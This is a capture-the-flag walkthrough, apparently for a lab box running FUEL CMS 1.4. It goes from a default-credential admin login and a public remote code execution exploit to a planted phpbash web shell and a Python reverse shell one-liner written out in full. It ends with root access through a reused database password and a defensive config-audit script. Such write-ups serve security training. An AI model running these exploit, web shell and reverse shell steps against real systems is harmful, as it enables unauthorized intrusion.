Start with an nmap scan:
$ sudo nmap -A -oA nmap 10.10.194.158
The only open port is 80, an Apache/2.4.18 web server. View the web page in a browser and we find it’s the default page for FUEL CMS 1.4, which also gives us some basic info about the CMS.
A quick Gobuster scan gives us nothing particularly useful:
$ gobuster dir -u http://10.10.194.158 -w /usr/share/wordlists/dirb/common.txt
While Gobuster was running, read the CMS page. We find many config files are located in “fuel/application/config/” (such as database.php and config.php), and near the bottom it mentions a login page, /fuel, and gives default creds. Check the page and we can log in with them with full admin rights!
Browsing the Dashboard we find a few Upload areas. These could be promising.
Before going into that, start simply. Checking Searchsploit with
$ searchsploit fuel
gives us “fuelCMS 1.4.1 - Remote Code Execution”. Sounds good. Copy it to our working directory with
$ searchsploit -m linux/webapps/47138.py
Edit the file so the URL in the Python script matches the box. You’ll also need to make sure Burp Suite is open, and turn off Intercept; alternatively, remove the two references to the proxy in the script.
Then run the Python script (using Python 2, as the script is incompatible with Python 3):
$ python 47138.py
You’ll be presented with a cmd: prompt. Try some things, such as
cmd:whoami
to confirm you’re in - note you’ll have to scroll up past the rubbish to get the actual result.
This shell is horrible, though, so let’s try and upgrade it. There is a browser-based PHP shell called phpbash, available at https://github.com/Arrexel/phpbash/blob/master/phpbash.php. Download the raw script to your machine with wget, set up a local server with
$ python3 -m http.server 4444
then download the file to the remote machine using
cmd:wget <your-THM-IP>:4444/phpbash.php
Then, in a browser, visit http://10.10.194.158/phpbash.php and you get a better shell.
We can further improve the shell by making it a Python one, using a script from https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Reverse Shell Cheatsheet.md#python. Change the script to include your IP, set up a netcat listener on your machine on port 4242 with
$ nc -lvnp 4242
and when you run it (in the phpbash shell - it won’t work in the cmd one) your netcat will give you a shell.
This is the Python reverse shell code:
www-data@ubuntu:/var/www/html#:python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.8.83.23",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
This shell can be further upgraded, first by running
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
then
$ export TERM=xterm
then backgrounding this shell with Ctrl-Z and running
$ stty raw -echo; fg
This gives us a nice, stable, interactive shell :)
Now we can get the first flag with
www-data@ubuntu:/var/www/html$ cat /home/www-data/flag.txt
However, access to root with
$ ls /root
is unsurprisingly denied.
We’ll need to privesc.
$ sudo -l
and
$ sudo -i
give us nothing, and there are no SUIDs found with
$ find / -perm -u=s -type f 2>/dev/null
Let’s check the config files from earlier, especially as one of them mentioned usernames and passwords. Change directory with
$ cd fuel/application/config
and then search all the files for the phrase “password” using grep:
$ grep -ni password *
One result looks interesting, line 80 of “database.php”:
database.php:80: 'password' => 'mememe',
Run
$ cat database.php
and have a read around line 80 - it suggests the password is for root!
Try it with
$ su root
and the password, and success! We get a # shell, and
# whoami
confirms we’re root.
# cat /root/root.txt
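The privilege escalation above came down to a database password sitting in plain text in database.php and reused for the root account. As an added defender-side example (not part of the original writeup), this Python script audits a config directory in the CodeIgniter/FUEL style for hardcoded secrets, a privileged database user and world-readable files; the sample database.php content and the fuel_schema name are constructed, not taken from the box.

```python
import re
import stat
from pathlib import Path

# Constructed sample in the CodeIgniter/FUEL CMS database.php style (not the box's real file).
SAMPLE_CONFIG = """<?php
$db['default'] = array(
    'dsn'      => '',
    'hostname' => 'localhost',
    'username' => 'root',
    'password' => 'mememe',
    'database' => 'fuel_schema',
);
"""

# Matches PHP array entries such as  'password' => 'secret',  with either quote style.
KV_RE = re.compile(r"""['"](\w+)['"]\s*=>\s*['"]([^'"]*)['"]""")
SECRET_KEYS = {"password", "passwd", "pass", "secret", "encryption_key"}


def parse_config(text):
    """Return a dict of key -> value for every quoted PHP array entry in text."""
    return {m.group(1): m.group(2) for m in KV_RE.finditer(text)}


def audit_config(name, text, mode):
    """Flag hardcoded secrets, a root DB user and loose permissions in one config file.

    mode is the file's st_mode; findings are returned as report strings."""
    findings = []
    if mode & stat.S_IROTH:
        findings.append(f"{name}: world-readable (mode {oct(mode & 0o777)})")
    entries = parse_config(text)
    for key, value in entries.items():
        if key.lower() in SECRET_KEYS and value:
            findings.append(f"{name}: hardcoded {key} found; rotate it and check for reuse on OS accounts")
    if entries.get("username") == "root":
        findings.append(f"{name}: database user is root; use a least-privilege DB account")
    return findings


def audit_config_dir(config_dir):
    """Walk a directory such as fuel/application/config and audit every .php file in it."""
    report = []
    for path in sorted(Path(config_dir).glob("*.php")):
        report.extend(audit_config(path.name, path.read_text(errors="replace"), path.stat().st_mode))
    return report


if __name__ == "__main__":
    for line in audit_config("database.php", SAMPLE_CONFIG, 0o100644):
        print(line)
```

Run against a real install, audit_config_dir("fuel/application/config") lists every file that needs a permission fix or a credential rotation.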